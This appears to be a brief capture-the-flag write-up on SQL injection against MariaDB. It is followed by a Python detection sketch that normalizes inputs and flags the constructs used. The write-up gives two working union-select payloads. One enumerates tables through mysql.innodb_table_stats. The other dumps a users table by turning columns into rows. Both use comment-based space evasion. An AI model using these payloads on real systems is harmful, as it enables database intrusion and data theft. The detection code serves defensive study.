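0x00: Key points
- SQL injection against MariaDB
- Injection without table names, converting columns into rows
0x01: Solution
Enumerate the table names: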
-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
PS: the trailing '22 closes the remaining single quote
Injection by converting columns into rows
-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
select group_concat(b) from(select 1 as b,2,3,4 union select*from diner)x
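For detection: both strings above use /**/ in place of spaces, so a signature applied to the raw parameter misses them. The sketch below is an added example, not part of the original write-up; the rule names and the benign sample are assumptions made for illustration. It normalizes the value first and then flags the three constructs this write-up relies on.

```python
import re
from urllib.parse import unquote_plus

# The two injection strings from this write-up, plus a constructed benign value.
TABLE_ENUM = ("-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/"
              "mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22")
COLUMN_TO_ROW = ("-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3"
                 "/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,"
                 "14,15,16,17,18,19,20,21,'22")
BENIGN = "student union, select committee 2019"  # constructed sample

# Hypothetical rule set, matched against the normalized value only.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    # Reading table names from the InnoDB statistics table.
    "innodb_table_stats_read": re.compile(r"\bmysql\s*\.\s*innodb_table_stats\b"),
    # Derived table that unions literal columns with "select * from <table>".
    "derived_table_select_star": re.compile(
        r"\bfrom\s*\(\s*select\b.*?\bunion\b.*?\bselect\s*\*\s*from\b"),
}

def normalize(value):
    """URL-decode, turn /* ... */ comments into spaces, collapse whitespace, lowercase."""
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def scan(value):
    """Return the sorted names of all rules that match the normalized value."""
    text = normalize(value)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def naive_scan(value):
    """Signature on the raw value, shown for contrast: it expects real whitespace."""
    return bool(re.search(r"union\s+select", value, re.I))

if __name__ == "__main__":
    for sample in (TABLE_ENUM, COLUMN_TO_ROW, BENIGN):
        print(naive_scan(sample), scan(sample))
```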